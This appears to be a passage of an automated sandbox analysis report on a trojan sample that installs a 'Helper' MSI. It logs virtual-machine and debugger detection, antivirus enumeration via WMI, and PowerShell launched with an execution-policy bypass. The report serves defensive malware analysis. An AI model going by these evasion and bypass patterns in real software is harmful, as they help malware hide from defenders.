                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                  Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6804Thread sleep count: 4389 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6804Thread sleep count: 4794 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5904Thread sleep time: -9223372036854770s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6784Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4389Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4794Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\shi69FA.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Helper Company LLC\Helper\7z2201-x64.exeJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI73EE.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI74BB.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI745C.tmpJump to dropped file
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: powershell.exe, 00000005.00000003.488873845.000000000816D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware
                  Source: powershell.exe, 00000005.00000003.403270333.000000000537A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
                  Source: powershell.exe, 00000005.00000002.538775864.0000000007145000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.406446885.0000000007152000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllg
                  Source: powershell.exe, 00000005.00000003.488873845.000000000816D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMwareUN6KW4MNWin32_VideoController3C_61XVCVideoController120060621000000.000000-000.075...7display.infMSBDA91A41U7OPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsZNPXN4YCLMEMp
                  Source: powershell.exe, 00000005.00000003.403270333.000000000537A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-VlB
                  Source: powershell.exe, 00000005.00000003.488873845.000000000816D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMwareUN6KW4MNWin32_VideoController3C_61XVCVideoController120060621000000.000000-000.075...7display.infMSBDA91A41U7OPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsZNPXN4YCc
                  Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00D66840 GetCurrentProcess,GetProcessAffinityMask,GetSystemInfo,GetModuleHandleA,GetProcAddress,GlobalMemoryStatus,0_2_00D66840
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00CF27F0 ReadFile,FindFirstFileW,FindClose,CreateEventW,CreateThread,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,0_2_00CF27F0
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00CCC9A0 FindFirstFileW,GetLastError,FindClose,0_2_00CCC9A0
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00CF3E10 FindFirstFileW,FindClose,CloseHandle,CloseHandle,CreateFileW,SetFilePointer,SetEndOfFile,FindCloseChangeNotification,DeleteFileW,DeleteFileW,DeleteFileW,CloseHandle,0_2_00CF3E10
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00CCC040 _wcsrchr,FindFirstFileW,FindFirstFileW,FindFirstFileW,FindClose,FindClose,0_2_00CCC040
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00CCE270 FindFirstFileW,FindClose,0_2_00CCE270
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00CCC3D0 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,GetFileAttributesW,FindNextFileW,0_2_00CCC3D0
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00D108C0 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,0_2_00D108C0
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00CDAB40 FindFirstFileW,FindClose,FindClose,0_2_00CDAB40
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00CFCDD0 FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,0_2_00CFCDD0
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00BD11B0 FindClose,PathIsUNCW,FindFirstFileW,GetFullPathNameW,GetFullPathNameW,FindClose,SetLastError,_wcsrchr,_wcsrchr,PathIsUNCW,0_2_00BD11B0
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00CFD1D0 FindFirstFileW,FindClose,0_2_00CFD1D0
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00CB1410 FindFirstFileW,FindNextFileW,FindClose,0_2_00CB1410
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeFile Volume queried: C:\Users\user\AppData\Roaming FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeFile Volume queried: C:\Users\user\AppData\Roaming\Helper Company LLC\Helper 1.0.0\install FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeFile Volume queried: C:\Users\user\AppData\Roaming\Helper Company LLC\Helper 1.0.0\install FullSizeInformationJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00CE1960 SHGetFolderPathW,GetSystemDirectoryW,GetWindowsDirectoryW,GetWindowsDirectoryW,GetModuleFileNameW,SHGetSpecialFolderLocation,__Init_thread_footer,LoadLibraryW,GetProcAddress,SHGetPathFromIDListW,SHGetMalloc,0_2_00CE1960
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00D9A0DB mov eax, dword ptr fs:[00000030h]0_2_00D9A0DB
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00D9A11F mov eax, dword ptr fs:[00000030h]0_2_00D9A11F
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00D8B5D7 mov ecx, dword ptr fs:[00000030h]0_2_00D8B5D7
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00D7F9A7 mov esi, dword ptr fs:[00000030h]0_2_00D7F9A7
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00D850F3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00D850F3
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00D7FABF GetProcessHeap,HeapFree,0_2_00D7FABF
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00BEB0B0 __set_se_translator,SetUnhandledExceptionFilter,0_2_00BEB0B0
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00D80536 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00D80536
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00D850F3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00D850F3

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Bypasses PowerShell execution policy
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss77D9.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi77C5.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr77D6.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr77D7.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "c:\windows\system32\msiexec.exe" /i "c:\users\user\appdata\roaming\helper company llc\helper 1.0.0\install\helper.msi" ai_setupexepath=c:\users\user\desktop\securiteinfo.com.win32.trojan-gen.16963.11783.exe setupexedir=c:\users\user\desktop\ exe_cmd_line="/exenoupdates /forcecleanup /wintime 1692671532 "
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -noprofile -noninteractive -executionpolicy bypass -file "c:\users\user\appdata\local\temp\pss77d9.ps1" -propfile "c:\users\user\appdata\local\temp\msi77c5.txt" -scriptfile "c:\users\user\appdata\local\temp\scr77d6.ps1" -scriptargsfile "c:\users\user\appdata\local\temp\scr77d7.txt" -propsep " :<->: " -linesep " <<:>> " -testprefix "_testvalue."
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "c:\windows\system32\msiexec.exe" /i "c:\users\user\appdata\roaming\helper company llc\helper 1.0.0\install\helper.msi" ai_setupexepath=c:\users\user\desktop\securiteinfo.com.win32.trojan-gen.16963.11783.exe setupexedir=c:\users\user\desktop\ exe_cmd_line="/exenoupdates /forcecleanup /wintime 1692671532 " Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -noprofile -noninteractive -executionpolicy bypass -file "c:\users\user\appdata\local\temp\pss77d9.ps1" -propfile "c:\users\user\appdata\local\temp\msi77c5.txt" -scriptfile "c:\users\user\appdata\local\temp\scr77d6.ps1" -scriptargsfile "c:\users\user\appdata\local\temp\scr77d7.txt" -propsep " :<->: " -linesep " <<:>> " -testprefix "_testvalue."Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss77D9.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi77C5.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr77D6.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr77D7.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00CCE790 GetCurrentProcess,OpenProcessToken,GetLastError,GetTokenInformation,GetTokenInformation,GetLastError,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,GetLastError,FindCloseChangeNotification,0_2_00CCE790
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00D80F72 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00D80F72
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00D0AC30 GetUserNameW,GetUserNameW,GetLastError,GetUserNameW,GetEnvironmentVariableW,GetEnvironmentVariableW,RegDeleteValueW,RegCloseKey,RegQueryInfoKeyW,RegCloseKey,RegCloseKey,RegDeleteKeyW,RegCloseKey,RegCloseKey,RegDeleteValueW,RegCloseKey,0_2_00D0AC30
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00D0C2F0 CreateNamedPipeW,CreateFileW,0_2_00D0C2F0
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00BB7480 GetVersionExW,GetVersionExW,GetVersionExW,IsProcessorFeaturePresent,0_2_00BB7480
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : select * from AntiVirusProduct
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
